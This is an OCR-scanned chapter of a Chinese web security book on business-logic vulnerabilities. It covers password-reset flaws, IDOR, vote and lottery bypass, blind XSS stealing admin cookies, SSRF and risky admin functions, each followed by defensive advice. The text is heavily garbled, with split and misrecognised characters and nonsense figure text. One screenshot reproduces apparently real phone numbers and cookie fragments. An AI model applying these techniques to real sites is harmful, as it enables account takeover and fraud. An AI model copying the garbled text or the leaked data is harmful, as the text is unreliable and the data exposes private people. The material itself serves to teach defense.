机 器 注册 已 经 被 拦截 得 差不多 ， 现 在 恶意 注册 的 诈骗 团伙 已 经 以 低 价 向 学 生 提供 兼职 注册 服务 ， 由 学 生 人 工 注册 账号 ， 填 写 验证 码 。 对 于 这 样 的 注册 方式 ， 就 只 有 用 大 数据 来 分 析 注 册 账 号 的 电脑 、IP 
以 及 注册 人 行为 去 防 控 。 在 注册 这 方面 ， 淘 宝 已 经 加 入 了 滑动 人 机 识别 ， 并 且 效果 非常 不 错 ， 如 图 11-9 所 示 。 
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对 于 用 户 注册 ， 需 要 有 以 下 几 个 安全 设计 思路 : 

1) 设计 验证 码 。 

2) 采集 用 户 机 器 唯一 识别 码 ， 拦 截 短 时 间 内 多 次 注册 。 
3) 根据 账号 格式 自学 习 识 别 垃圾 账号 。 


4) 防止 SQL 注 入 漏洞 与 XSS 漏 洞 (常见 ) 。 


11.4 ”密码 找 回 


密码 找 回 是 出 现 逻 辑 问题 最 多 的 一 个 功能 ， 因 为 它 的 交互 流程 最 多 ， 目 前 找 回 密码 的 方式 比较 常见 的 有 邮箱 验证 码 、 手 机 验证 码 以 及 密 保 问 题 ， 这 个 流程 通常 如 图 11-10 所 示 。 


输入 








图 11-10 
这 个 三 个 大 流程 中 都 经 常 有 一 些 逻 辑 问 题 ， 下 面 我 们 来 详细 看 看 。 
1. 输 入 用 户 名 /邮箱 /手机 阶段 


这 里 有 一 个 交互 过 程 ， 即 需要 输入 要 重 置 的 账号 信息 ， 单 击 确定 的 时 候 ， 目 前 大 部 分 的 应 用 会 直接 从 数据 库 中 读 取 用 户 邮箱 和 手机 信息 ， 并 且 发 送 验证 码 ， 还 有 一 部 分 程序 在 输入 用 户 名 后 ， 会 提示 使 
用 手机 还 是 邮箱 找 回 密码 ， 并 且 邮 箱 和 手机 号 中 的 一 部 分 会 显示 在 页 面 上 ， 比 如 网 易 账号 ， 如 图 11-11 所 示 。 


提交 的 时 候 可 以 直接 抓 包 修改 手机 或 者 邮箱 参数 ， 这 时 候 如 果 后 端 没 有 做 验证 ， 原 本 发 送 给 账号 A 的 验证 码 会 发 送 到 被 我 们 自 改 的 手机 或 者 邮箱 上 ， 利 用 接收 到 的 验证 码 即 可 重 置 密码 。 
2. 填 写 验 证 码 和 新 密码 阶段 


填写 验证 码 和 新 密码 就 意味 着 我 们 已 经 拿 到 了 验证 码 或 者 重 置 密码 的 URL， 这 里 存在 的 问题 主要 有 : 
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E 11-11 


1) 验证 凭证 较 简 单 ， 可 以 被 暴力 破解 。 目 前 大 多 数 手 机 短信 重 置 密码 的 验证 码 都 是 4 位 或 者 6 位 数字 ， 如 果 提 交 验 证 码 的 地 方 没有 对 这 个 验证 码 进行 错误 次 数 限 制 ， 则 会 存在 可 以 爆破 的 问题 ， 这 是 目 


前 最 带 见 的 一 种 找 回 密码 漏洞 利用 方式 。 


2) 验证 凭证 算法 简单 ， 赁 证 可 预测 。 部 分 网 站 找 回 密码 的 Token 是 根据 当前 的 “用 户 名 + 邮箱 ”或 者 时 间 戳 进行 一 次 MD5 后 生成 ， 这 就 存在 一 定 的 预测 性 ， 利 用 自己 写 的 算法 去 碰撞 即 可 拿 到 争取 到 的 
重 置 密码 凭证 。 


3) 验证 凭证 直接 保存 在 源码 里 。 这 种 目前 比较 少 ， 不 过 也 存在 一 定 比 例 ， 一 种 是 在 点 击发 送 验证 码 的 时 候 就 可 以 直接 在 源码 里 看 到 给 当前 手机 或 者 邮箱 发 送 过 去 的 验证 码 ， 还 有 一 种 是 在 输入 验证 码 的 
时 候 ， 源 码 里 面 就 直接 保存 了 正确 的 验证 码 。 


3. 友 送 新 密码 阶段 


赁 证 未 绑 定 用 户 : 我 们 在 找 回 密码 的 时 候 ， 发 送 到 邮箱 的 链接 通常 是 如 下 这 个 样子 





http: //www.xxx.com/user.php? m=repwd&uid= 用 户 ID&key= 和 凭证 密 钥 &email= 邮 箱 


当 请 求 这 个 链接 的 时 候 ， 后 端 程序 根据 uid 和 key 对 应 上 了 从 而 判断 这 个 找 回 密码 的 链接 有 效 ， 但 是 在 将 新 密码 提交 到 服务 器 的 时 候 ， 服 务 器 端 并 没有 判断 当前 这 个 Key 是 否 跟 uid 或 者 email 匹 配 ， 而 是 
直接 修改 掉 了 uid 或 者 email 指 定 的 用 户 密码 ， 这 样 我 们 只 要 拦截 修改 密码 的 请 求 包 ， 将 里 面 的 用 户 参数 修改 成 我 们 要 算 改 密码 的 用 户 账号 即 可 。 


基于 以 上 对 密码 找 回 的 利用 方法 分 析 ， 可 以 想到 的 安全 风险 点 应 该 注意 的 有 : 

1) 接收 验证 码 的 邮箱 和 手机 号 不 可 由 用 户 控制 ， 应 该 直接 从 数据 库 中 读 取出 来 。 

2) 加 强 验证 和 凭证 复杂 度 ， 防 止 被 暴力 破解 。 

3) 限制 验证 凭证 错误 次 数 ， 单 个 用 户 在 半 个 小 时 内 验证 码 错误 三 次 ， 半 小 时 内 茶 止 找 回 密码 。 
4) 验证 凭证 设置 失效 时 间 。 

5) 验证 凭证 不 要 保存 在 页 面 。 

6) 输入 用 户 邮箱 或 ID、 手 机 号 取 验 证 凭证 的 地 方 需要 设置 验证 码 防 止 短信 炸弹 和 批量 找 回 等 。 


7) 验证 凭证 跟 用 户 名 、 用 户 ID、 用 户 邮箱 绑 定 ， 找 回 密码 时 验证 当前 凭证 是 否 是 当前 用 户 的 。 


115 ”资料 查看 与 修改 
用 户 的 资料 操作 涉及 权限 问题 ， 其 实 这 里 主要 介绍 的 是 越权 漏洞 的 利用 场景 ， 为 了 保护 用 户 的 隐私 ， 大 多 数 网 站 提供 了 用 户 权限 控制 的 功能 ， 用 户 可 以 自己 设置 个 资料 是 否 多 许 别人 查看 ， 在 权限 控 
制 方面 ， 主 要 有 以 下 几 种 利用 场景 


1) 未 验证 用 户 权 限 。 这 里 说 的 未 验证 用 户 权限 是 指 直接 修改 当前 资源 ID 即 可 浏览 该 资源 ， 没 有 验证 当前 这 个 资源 是 否 属于 当前 用 户 ， 比 如 用 户 A 的 订单 ID 是 111， 用 户 B 的 订单 ID 为 222， 用 户 A 登 录 后 
查看 自己 订单 详情 的 时 候 ， 将 URL 中 的 订单 I1D 参 数 改 为 222 即 可 看 到 用 户 B 的 订单 ，2014 年 的 时 候 阿里 巴巴 国际 贸易 站 因为 这 个 漏洞 被 炒作 受 了 很 大 的 奥 论 影响 。 


2) 未 验证 当前 登录 用 户 。 上 一 种 情况 是 没有 验证 当前 这 个 资源 是 否 属于 当前 用 户 ， 而 这 种 情况 是 虽然 程序 绑 定 了 用 户 1D 和 资源 ID， 但 是 这 个 用 户 1D 是 在 访问 资源 时 直接 从 cookie 或 者 Post、get 参 数 里 
面 获取 的 ， 所 以 我 们 只 要 在 cookie 里 面 把 用 户 1D 修 改 成 另外 一 个 用 户 的 ID， 就 可 以 利用 他 的 权限 操作 他 的 东西 ， 这 是 目前 见得 比较 多 的 一 种 情况 。 


上 面 介绍 的 两 种 情况 ， 昌 然 只 是 列举 用 户 资料 查看 ， 但 是 更 多 的 出 现 是 在 用 户 资料 修改 ， 比 如 个 人 资料 、 订 单 、 密 码 ， 等 等 。 
对 于 用 户 注册 功能 我 们 需要 用 到 的 防御 思路 有 : 
- 用 户 资源 ID 〈 订 单 ID、 地 址 ID 类 似 ， 等 等 ) 绑 定 到 用 户 ， 只 允许 有 权限 的 用 户 查 看 。 


: 当前 用 户 信 息 存 储 到 session， 不 放 到 tequest 中 ， 避 免 攻 击 者 修改 当前 用 户 ID。 


11.6 “投票 /积分 /抽奖 


投票 和 抽奖 以 及 积分 在 很 多 促销 活动 或 者 推广 手段 上 都 经 常用 到 ， 背 后 的 奖品 成 本 可 能 上 数 十 万 ， 如 果 这 些 奖品 被 恶意 用 户 (黄牛 ) 刷 走 了 ， 不 仅 推广 的 效果 没有 ， 而 且 浪 费 了 成 本 投入 ， 如 图 11-12 
所 示 。 


和 分 抽奖 31501289 活动 时 间 : 15-07-13 00:00%15-07-27 09:59 ZIEL 8:00X18442659551^ epee 


ttHEEOS-700D |# SONY W530 相 

300 积 分 yy — 机 

中 奖 名 额 : 1 7 200 积 分 

参加 数 : 940684 | M | 中 奖 名 额 : 1 
Asl 参加 数 : 400750 


SERERE 


iPod shuffle 2G | à 39Q 
| 150704; ! | 150704} 
| 中 奖 名 额 : 1 - 中 奖 名 额 : 1 
Shit: 389739 A 3 参加 类: 119532 





























图 11-12 


不 管 是 投票 、 积 分 还 是 抽奖 ,都 存在 一 个 共同 点 : 即 单个 用 户 次 数 人 存在 限制 ， 比 如 一 场 活动 中 一 个 用 户 只 能 抽奖 一 次 。 这 样 的 限制 也 会 存在 很 多 种 绕 过 方式 ， 下 面 我 们 来 看 一 个 真实 案例 ， 笔 者 在 乌云 
找 了 这 么 一 个 漏洞 : 


缺陷 编号 : WooYun-2014-65631 

漏洞 标题 : 设计 缺陷 导致 抽奖 功能 存在 刷 次 数 情况 

相关 厂商 : M1905.COM 

漏洞 作者 : BAP 

我 们 来 看 看 漏洞 情况 。 首 先 ， 注 册 账 号 进入 http://t4.m1905.com/ 来 到 抽奖 部 分 ， 然 后 做 完 两 个 任务 ， 可 以 抽 两 次 奖 ， 抽 完 后 页 面 如 图 11-13 所 示 。 


抽 完 奖 之 后 删除 cookieshared_t42014 和 logind_t42014， 刷 新 页 面 后 即 可 再 次 做 任务 并 抽奖 ， 如 图 11-14 所 示 。 


变形 金刚 拉杆 箱 


Fae 





图 11-13 


变形 金刚 拉杆 箱 


m 





从 这 个 案例 中 可 以 看 到 程序 是 基于 cookie 验 证 ， 所 以 删除 相应 cookie 即 可 绕 过 限制 。 
通常 抽奖 和 投票 有 如 下 几 种 利用 方法 : 


1) cookie 或 POST 请 求 正文 绕 过 。 有 的 应 用 将 验证 是 否 抽奖 或 者 领取 积分 的 判断 值 放置 在 cookie 或 者 POST 的 请 求 正文 里 ， 服 务 器 端 获 取 到 这 个 结果 后 判断 是 否 还 有 机 会 抽奖 ， 而 这 个 数据 我 们 是 可 以 
直接 在 数据 包 中 修改 的 ， 所 以 就 会 产生 绕 过 ， 比 如 cookie 中 isok=1 代 表 已 经 抽奖 ,isok=0 代 表 还 没有 抽奖 ， 而 我 们 只 要 再 点 击 抽奖 ， 然 后 把 isok 的 值 改 为 0 即 可 一 直 抽 奖 。 


2) 基于 IP 验 证 。 做 得 比较 弱 的 统计 是 直接 基于 IP 验 证 ， 像 访问 量 、 推 广 获取 积分 等 ， 这 类 要 看 程序 获取 IP 的 方式 ， 如 果 是 client-ip 或 者 x forword _ for 获取 IP， 则 可 以 直接 伪造 |[P 绕 过 。 


3) 基于 用 户 认证 。 也 有 一 部 分 应 用 需要 登录 以 后 才能 抽奖 或 者 投票 ， 这 类 可 以 结合 看 看 能 不 能 批量 注册 ， 如 果 可 以 ， 则 可 以 用 程序 实现 批量 登录 刷 票 ， 或 者 投票 的 时 候 POST 包 或 者 cookie 里 面 的 当前 
uid、 用 户 名 等 是 否 可 以 随意 修改 绕 过 用 户 单 次 限制 。 


从 上 面 利用 手段 可 以 看 到 主要 的 三 个 点 是 IP、 登 录用 户 cookie， 分 析出 可 用 性 较 高 的 防御 手段 如 下 : 
* 机 器 识别 码 验 证 ， 每 台 机 器 都 可 以 根据 硬件 信息 生成 唯一 的 识别 码 。 


* 操作 需要 登录 ， 当 前 用 户 信 息 从 session 中 读 取 。 


11.7 ”充值 支付 


关于 支付 漏洞 已 经 在 6.2.1.4 节 详细 介绍 过 ， 主 要 有 四 种 ， 分 别 是 客户 端 可 修改 单价 、 总 价 和 购买 数量 以 及 利用 时 间 差 多 次 购买 ， 这 里 不 再 反复 介绍 ， 针 对 这 四 种 情况 的 主要 应 对 手法 是 : 
1) 保证 数据 可 信 ， 商 品 单价 及 总 价 不 可 从 客户 端 获取 。 
2) 购买 数量 不 能 小 于 等 于 0。 


3) 账户 支付 锁定 机 制 ， 当 一 个 支付 操作 开始 就 应 该 立马 锁定 当前 账户 ， 不 能 同时 两 个 后 端 请 求 对 余额 进行 操作 。 


11.8 私信 及 反馈 
私信 和 上 反馈 功能 在 大 多 数 网 站 中 都 能 见 到 ， 特 别 是 社交 应 用 ， 私 信 征 必 不 可 少 的 功能 。 这 个 功能 是 两 个 用 户 之 间 互 动 使 用 ， 两 端 都 是 人 ， 除 了 特殊 情况 下 可 以 滤 去 的 SQL 注入 或 者 命令 执行 等 少见 漏洞 
外 ， 最 常见 的 就 是 XSS 漏 洞 以 及 越权 漏洞 。 


近年 流行 的 XSs 言 打 平台 把 Xss 漏 洞 推 向 了 利用 高 潮 ，XSsS 盲 打 是 指 在 不 确定 能 否 利用 的 情况 下 输入 XSsS 代 码 进行 不 可 预知 的 攻击 ， 而 这 正 是 利用 了 私信 和 反馈 这 些 功 能 ， 因 为 这 些 功能 可 以 直接 跟 管 理 
员 沟 通 ， 利 用 其 中 存在 的 XSS 漏 洞 拿 到 管理 员 cookie 数 据 。 我 们 来 看 乌云 网 的 一 个 例子 : 


缺陷 编号 : WooYun-2015-118779 

漏洞 标题 : 爱 鲜 蜂 app 某 处 可 育 打 已 入 后 台 
相关 厂商 : 爱 鲜 蜂 

漏洞 作者 : BAF 


在 应 用 的 意见 反馈 处 插入 XSS 代 码 ， 如 图 11-15 所 示 。 


11:58 @ -*Y g 100% NEP 


< 意见 反馈 发 送 


您 的 批评 和 建议 能 帮助 我 们 更 好 完善 产品 ， 傅 留 下 
A B ERRAT! 


| 请 输入 宝贵 意见 (300 字 以 内 ) 





图 11-15 


当 管 理 员 在 Web 后 台 查 看 反馈 后 ， 即 可 获得 管理 员 的 cookie， 如 图 11-16 所 示 。 


dns 2015-06-06 e Title : %US40E%USSFO%uUs e HTTP REFERER : http-//be 
23:18:17 BA1%u7406 equick cn/system/feedback? 
e location : http //beequick.cn/ page-1727 
system/feedback?page-1 72 e HTTP. USER AGENT : Mozil 
7 la/5.0 (Windows NT 6.1; WO 
e toplocation : http-//beequick. W64) AppleWebKit/537 36 ( 
cn/system/feedback?page- KHTML, like Gecko) Chrome 


1727 /40.0.2214.111 Safari/537.3 
e cookie : BEE:2-54fd0e80b1 6 

7982678; PEIFSESSID-iv4AC e REMOTE_ADDR: 114.111.1 

insi RI a ER ri" KS]; | 67.113 

ul. mia. De 57f0b 

ee m a 





图 11-16 


最 后 利用 cookie 登 录 后 台 ， 如 图 11-17 所 示 。 


18910335622 2015-03-13 09:18:32 我 还 把 这 
13051955714 2015-03-13 09:18:36 电话 : 1305 
13811693020 2015-03-13 09:20:27 TRER, FIN 
18710021687 2015-03-13 09:23:04 我 的 订单 过 
13810629763 2015-03-13 09:24:22 HSS 
18600413690 2015-03-13 09:34:13 





图 11-17 


对 于 私信 和 反馈 的 XSs 漏 洞 防御 并 没有 什么 特别 的 手段 ， 跟 我 们 之 前 介绍 过 的 XSs 防 御 方 法 一 样 ， 最 主要 的 是 将 特殊 字符 进行 过 滤 ， 另 外 是 使 用 白 名 单 和 黑 名单 结 合 的 方式 。 


11.9 ”远程 地 址 访问 


Wordpress、phpcmsd 等 众多 应 用 都 有 访问 远程 地 址 获取 资源 的 功能 ， 这 个 功能 产生 的 漏洞 叫做 SSRF (Server-Side Request Forgery) ， 我 们 在 QQ 消息 中 发 送 网 页 链接 的 时 候 ， 会 显示 出 网 页 的 标 
题 和 部 分 内 容 ， 这 就 说 明 腾 讯 的 服务 器 有 去 访问 我 们 发 送 的 这 个 链接 ， 那 如 果 腾 讯 没有 做 地 址 限制 ， 我 们 在 聊天 框 里 面 发 送 一 个 腾讯 内 网 的 一 个 地 址 ， 那 它 再 去 访问 的 时 候 我 们 就 能 知道 这 是 一 个 内 网 的 什 
么 系统 ， 造 成 信息 泄露 ， 甚 至 内 网 漏洞 利用 ， 我 们 来 看 一 个 乌云 网 的 例子 : 


缺陷 编号 : WooYun-2015-118052 

漏洞 标题 : 美丽 说 某 处 sstf 探 测 内 网 存活 主机 
相关 厂商 : 美丽 说 

漏洞 作者 : XE 

提交 时 间 : 2015-06-04 09: 37 


美丽 说 开发 平台 http://center.open.meilishuo.com/app/createApp 有 一 个 填写 回调 地 址 的 地 方 ， 当 填写 的 时 候 服 务 器 会 去 访问 这 个 地 址 是 否 有 效 ， 如 图 11-18 所 示 。 


授权 协议 : OAuth2.0 Service-side 


架构 类 型 : 0 Web 回调 UFL http: //172. 16. 2. 16 
© 客户 出 应 上 


123 


我 已 阅读 并 同意 美丽 说 开 旅 平台 合作 居 伴 开发 协议 闪 
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图 11-18 


如 果 有 人 恶意 填 个 内 网 呢 ， 先 看 看 当 填 写 一 个 不 存在 的 地 址 时 ， 页 面 会 返回 “回调 地 址 检测 失败 ”， 如 图 11-19 所 示 。 
授权 协议 :  OAuth?.0 Service-side 
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图 11-19 


当地 址 存在 时 ， 则 会 返回 “回调 地 址 检测 成 功 ”， 如 图 11-20 所 示 ， 那 我 们 就 可 以 利用 这 个 返回 结果 的 差异 来 对 比 ， 批 量 扫描 内 网 。 


PHEXWHMM: | OAuth2.0 Service-side 


架构 类 型 : @ web 回调 URL 


O *&r3AWB Un 
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图 11-20 
案例 里 面 是 HTTP 协 议 的 探测 ， 实 际 上 这 个 跟 协 议 没有 关系 ， 之 前 也 有 厂商 出 现 过 连接 远程 MySQL 服 务 同样 的 SSRF 漏 洞 。 


这 类 漏洞 防御 看 起 来 好 像 没 有 什么 难度 ， 只 要 限制 填写 就 可 以 ， 但 是 大 部 分 厂商 修复 的 时 候 应 该 不 会 考虑 到 短 地 址 的 问题 ， 所 以 在 修复 之 后 仍然 可 以 通过 生成 短 链 接 来 利用 ， 建 议 修 复 的 时 候 注意 这 


ANNO 


11.10 “文件 管理 


文件 管理 功能 本 身 就 是 一 个 高 危 功 能 ， 可 以 直接 对 服务 器 中 的 文件 进行 操作 ， 包 括 上 传 、 下 载 、 修 改 、 删 除 ， 如 果 权 限 管理 不 当 ， 可 能 导致 被 黑客 直接 利用 该 功能 写 入 webshell， 实 际 上 目前 大 多 数 上 
传 webshelI 的 方式 确实 是 利用 了 文件 操作 功能 ，dedecms 后 台 的 文件 管理 就 是 非常 典型 的 一 个 例子 ， 如 图 11-21 所 示 。 
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E 1121 
一 个 文件 管理 功能 为 了 保证 安全 ， 在 满足 业务 需求 的 情况 下 ， 设 计 的 时 候 应 该 遵循 以 下 几 个 点 : 


1) 荣 止 写 入 脚本 可 和 企 服务 器 端 执 行 的 文件 。 比 如 服务 器 能 解析 PHP， 那 么 在 设计 文件 管理 这 个 功能 的 时 候 ， 就 需要 限制 不 能 操作 PHP 扩 展 名 的 文件 和 PHP 标 签 的 代码 。 为 什么 说 连 代码 标签 也 要 限制 ? 
因为 前 端 页 面 的 都 套用 了 HTML 模 板 ， 大 多 是 直接 包含 了 HTML 文 件 ， 如 果 我 们 直接 在 模板 文件 中 插入 PHP 人 代码， 最 终 也 能 执行 。 


2) 限制 文件 管理 功能 操作 的 目录 。 通 常 需要 被 管理 的 文件 只 有 模板 文件 以 及 图 片 文 件 ， 所 以 我 们 可 以 在 文件 管理 功能 上 限制 只 能 操作 这 两 个 目录 ， 目 录 不 能 从 客户 端 提交 ， 直 接 在 代码 中 设置 好 即 可 ， 
如 果实 在 需要 进行 目录 跳 转 的 话 ， 一 定 要 禁止 提交 http://www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/15497/OEBPS/Text/../V 
\http://www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/15497/OEBPS/Text/..， 避 免 越 权 操 作 其 他 目录 ，。 


3) 限制 文件 管理 功能 访问 权限 。 之 前 我 们 已 经 说 到 文件 管理 功能 本 身 就 是 一 个 非常 敏感 的 功能 ， 虽然 是 一 个 正常 的 功能 ,但 是 已 经 有 一 点 后 门 的 性 质 ， 所 以 对 于 这 个 功能 的 访问 权限 一 定 要 进行 严格 的 
控制 。 


4) 禁止 上 传 特殊 字符 文件 名 的 文件 。 大 多 数 应 用 都 会 对 上 传 的 文件 进行 展示 ， 特 别 是 对 外 开发 的 网 盘 类 应 用 ， 这 时 候 就 要 注意 对 上 传 的 文件 名 进行 检查 ， 禁 止 文件 名 中 有 尖 括 号 、 单 双 引 号 等 特殊 字 
符 ， 避 免 攻 击 者 用 文件 名 来 进行 XSS 攻 击 。 


11.11 ”数据库 管理 


数据 库 管 理 跟 文件 管理 一 样 ， 也 是 一 个 高 危 功 能 ,可 以 直接 操作 数据 库 ， 对 数据 库 进行 备份 、 执 行 SQL 语 句 ， 等 等 ， 如 果 启 动 数 据 库 服务 的 系统 用 户 以 及 数据 库 用 户 的 权限 都 够 大 ， 那 么 完全 可 以 利用 
这 个 功能 直接 执行 系统 命令 以 及 操作 服务 器 上 的 文件 ， 如 图 11-22 所 示 。 
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图 11-22 


数据 库 管 理 有 多 个 功能 形式 ， 比 如 discuz 的 数据 库 管理 就 是 一 个 备份 和 优化 的 功能 ， 其 备份 功能 是 可 以 操作 所 有 表 ， 另 外 一 种 是 可 以 直接 执行 SQL 语句 进行 操作 。 对 于 这 两 种 情况 下 的 安全 设计 ， 应 该 
注意 以 下 几 个 点 : 


1) 限制 可 以 操作 的 数据 库 表 ， 如 果 是 数据 库 备 份 可 以 直接 在 代码 里 面 写 死 只 能 操作 哪些 表 ， 如 果 是 执行 SQL 语句 的 方式 可 以 另 建 一 个 MySQL 用 户 ， 限 制 可 以 操作 的 表 和 字段 。 


2) 限制 备份 到 服务 器 上 的 文件 名 ， 需 要 系统 随机 生成 类 似 md5 并 且 长 度 不 能 低 于 16 位 ， 扩 展 名 不 能 自 定义 ， 这 样 做 的 目的 一 是 防止 攻击 者 利用 该 功能 导出 webshell， 二 是 防止 被 猜 解 到 文件 名 直接 下 
载 。 


11.12 命令 /代码 执行 


命令 执行 和 代码 执行 功能 通常 都 在 系统 后 台 ， 相 比 来 说， 命令 执行 的 功能 使 用 的 更 多 一 点 ， 代 码 执行 功能 在 特殊 应 用 上 面 才 会 存在 ， 而 命令 执行 在 类 似 Zabbix、WDCP 等 大 量 运 维系 统 上 都 存在 ， 如 图 
11-23 所 示 。 





Operation type | Remote command Y 


Target list Target 


Current host 


Type Custom script Y 


tera 
- 


Execute on | @ Zabbix agent | 
| @ Zabbix server | 


Ej 
E] 
E a 


Commands sudo /usr/local/mongodb/start_mongod.sh 


Conditions 


Label Name 


(A) Event acknowledged = "Not Ack" 





E 1123 
该 功能 可 以 直接 在 服务 器 上 执行 系统 命令 ， 危 害 性 自然 不 言 而 喻 ， 命 令 执行 和 代码 执行 功能 再 加 上 前 面 提 及 的 文件 管理 和 数据 库 管 理 功能 ， 目 前 的 webshell 功 能 也 不 过 如 此 了 。 
一 旦 这 个 功能 被 拿 下 ， 基 本 上 服务 器 就 沦陷 了 ， 所 以 在 设计 这 类 功能 时 应 该 注意 以 下 几 点 : 
1) 严格 控制 该 功能 访问 权限 ， 建 议 高 权限 才能 访问 。 
2) 在 满足 业务 需求 的 情况 下 ， 可 以 设置 命令 白 名 单 ， 可 使 用 escapeshellcmd () 以 及 escapeshellarg () 函数 进行 过 滤 ， 命 令 直接 写 死 在 代码 中 更 好 。 
3) 给 命令 及 代码 执行 功能 设置 独立 密码 。 
4) 代码 执行 功能 限制 脚本 可 访问 的 路 径 。 


5) 在 满足 需求 的 情况 下 限制 当前 执行 命令 的 系统 用 户 权限 。 


11.13 “文件 /数据 库 备 份 
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网 站 源码 备份 和 数据 库 备 份 是 非常 常见 的 一 个 功能 ， 也 是 非常 容易 出 现 安全 问题 的 一 个 功能 ， 如 图 11-24 所 示 为 discuz 数 据 库 备 份 功能 ， 需 要 配置 多 个 选项 ， 图 中 为 discuz 后 台数 据 库 导 出 功能 。 


通常 文件 和 数据 库 备 份 功能 容易 出 现 的 问题 有 如 下 几 种 情况 : 

1) 未 授权 访问 和 越权 访问 。 未 授权 访问 体现 在 这 个 备份 功能 直接 在 不 登录 或 登录 验证 存在 漏洞 的 情况 下 可 以 直接 使 用 ， 以 及 人 存在 CSRF 漏 洞 可 以 直接 劫持 管理 员 账 号 进行 备份 ，discuz 的 CSRF 备 份 数据 
漏洞 就 是 非常 好 的 一 个 例子 。 

2) 备份 文件 名 可 预测 。 备 份 文件 名 要 么 是 备份 的 时 候 人 工 设置 的 ， 要 么 是 自动 生成 的 ， 如 果 是 人 工 设置 的 ， 在 使 用 完 这 个 功能 后 可 能 存在 忘记 删除 备份 文件 ， 导 致 恶意 用 户 可 以 利用 枚 举 的 方式 扫描 到 
这 个 备份 包 。 而 自动 生成 则 可 能 人 存在 生成 的 文件 名 比较 弱 的 问题 ， 比 如 生成 的 文件 名 为 当前 日 期 ， 只 要 简单 遍历 下 即 可 扫描 到 ， 非 常 不 可 靠 。 

3) 生成 的 文件 可 利用 Web 中 间 件 解析 漏洞 执行 代码 。 


渗透 测试 中 写 入 webshell 经 常会 用 到 Web 中 间 件 的 解析 漏洞 ， 而 当 备份 功能 可 以 自 定义 文件 名 的 时 候 ， 只 要 在 数据 库 中 写 入 PHP 代 码 ， 然 后 在 1S 下 时 ， 利 用 数据 库 备份 功能 生成 类 
似 “1.asp; jpg” 文件 名 的 文件 ， 到 Apache 的 下 就 备份 成 文件 名 为 “1.php.zip” 这 样 的 文件 ， 就 可 以 直接 执行 我 们 在 数据 库 中 插入 的 代码 。 


Hm UE RE 





© 系统 MySQL Dump (Shell) 备份 
@ Discuz! HF - 文件 长 度 限制 (单位 : KB)12048 





使 用 扩展 插入 (Extended Insert)755t: 
OR ez 





建 表 语句 格式 : € 





gn 
O MySQL 3.23/4.0.x 
© MySQL 4.1.x/5.x 






O GBK O Urr-8 
十 六 进 制 方式 : 
©? OS 
ERNA: 


O $248589t—Txft 
O 8841-20 ERU PE 
TERR 


sime: 





(150908, E59f779P sql 


dax | 回 更 多 造 项 


图 11-24 





针对 如 上 的 分 析 ， 我 们 来 总 结 一 下 怎么 设计 备份 功能 : 


1) 进行 权限 控制 ， 由 于 备份 功能 是 一 个 非常 高 危 敏感 的 功能 ， 一 定 要 限制 高 权限 才能 使 用 。 


2) 文件 名 随机 生成 ， 不 可 预测 ， 可 以 把 当前 时 间 戳 加 上 6 位 以 上 字母 和 数字 随机 生成 的 字符 串 进 行 md5 来 做 为 文件 名 。 


11.14 API 


API (Application Programming Interface， 应 用 程序 编程 接口 ) 是 一 些 预先 定义 好 的 类 和 函数 ， 为 其 他 程序 提供 一 个 简单 的 资源 调用 接口 ， 调 用 API 接 口 通常 需要 给 它 一 个 参数 ，API 根 据 这 个 参数 
计算 结果 返回 给 调用 方 ， 返 回 形 式 有 JSON、 序 列 化 、Base64 编 码 等 方式 ， 这 种 API 随 处 可 见 ， 如 图 11-25 所 示 为 新 浪 网 的 一 个 API 接 口 。 


| Method | URL 


http-//cre. mix. sina.com.cn GET 


EL 
Request | Respons 


HTTP/1.1 200 OK 

Server: nginx 

Date: Tue, O8 Sep 2015 D8:57:13 GMT 
Content-Type: application/json; charset-utf-B 
Connection: close 

Cache-Control: no-cache 
SINAÀ-LB:aGEuHzMuzzEuczhnLmxiLnEphmFubzkRlLmblv5Qo-- 
S3INAÀ-TS:iTzhlILbkO0TYTzUdgHcAwIDACGQMTIGQMzE 
Content-Length: 51442 


feedCardJsonpCallback|["result":["total":178,"data":[("comment total":3&6Hl,"images":[("u":"http:XV//n.sinaimg.cni/transform)/Zz015DBDBY 
KyT-fxhdqhuid857548.jpqg","h":364,"yw":57(0],"reason":l,"wapsummary":"".,''ideo id":0, "intro": "QOO09S0800000000000000000000000000¥3 r000000000 
/Sports.sina.com.cni/others|/volleynallW/ZzU15-UB-UBH|/doc-ifxhqrtsx3EZBHB7H.shtml?cre-mysinapc&mod-r&loc-31&r-h&rfunc-z","auchoruid":D, "ec 
title": "00000000000 i 


000000000" , "et ime": 1441687470, "keywords": "00,00, 0000", "wapurl":"http:\/')/sports.sina.cn) / others /volleyoall) /2015-09-08) /detail-ifhqts 
657,760,1153,1550", "summary": "", "wapurls":"[\"http:\\\/\\\/sports.sina.cn\\\/others\)\\/volleyball\'\'/2015-09-086\\\\/detail-itxhqtsx3 6266 
4,"hasVideo":0, "video time length":0},{"comment total":1103, "images": [{"u": "http: \/\/www.sinaimg.cn\/dy\/slidenews'\/61 img./2015 36',/ 40 
U15 36\/40602 1259464 SB5B5B3.]pg","n":"37B","w":"S5DU"P,["u":" Ltp:\/\/w0w.sinaimg.cn\/dy\/slidenews\/6l img\/2015 36)\/40602 1259465 19; 
258465 238B5B.jpg","h":"224", "y";"32D"J,["u": "http: V/s www. sinaimg.cni/dy\/slidenews\/61.img\/2015 36) /40602.1259467 52B751.]pg","h":"4 
pg" "h":"373", "u": "500"}. prgns'htbtmi/AZ/www.asineimd.coni/duvv/slidenewsVi/.51 imdXi/2015. 36\ /40602 1258469 557552. to. "Hh" "38g M, "wy": "S500"} 

q";"3183")],"img":["u";"http:V/N/www.Sinaimg.cny/dyV/slidenewsi/61 imgi/2015 36\/40602 1259469 557552.]pg","h":388, "w": 500}, "reason" :1,' 
/slide.history.sina.com.cn./y*/slide 61 40602 &6ZB566.html?cre-mysinapc&mod-f&loc-32&r-h&rfunc-2","stitle":"[DDn]lmÓu","auzshaer":"","cornm 
50,1550", "etime": "1441072337", "keywords" : "00,00,00", "wapur 1" :"http:ì\/\/photo.sina.cn/album 61 40602 B5zB8B6.htm?cre-mysinapc&mod-rf&loc 

00000 “0000000 " , "wapuris":"[\ "http: i/\\\/photo.sina.cn\\\/album 61 40602 &2B66.htmX"] ", "vid":"D","video id":"D","comment reply":984," 
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图 11-25 


MEPS SI SEDENT 182653, KIHORE, IOSSEAPPrBGERBRI, SHAME IE sS, AAEREN APO, PAORS EA S 
洞 就 相对 较 多 ， 如 图 11-26 所 示 是 乌云 网 搜索 “接口 ”关键 字 的 结果 ， 数 量 达 到 上 干 条 。 

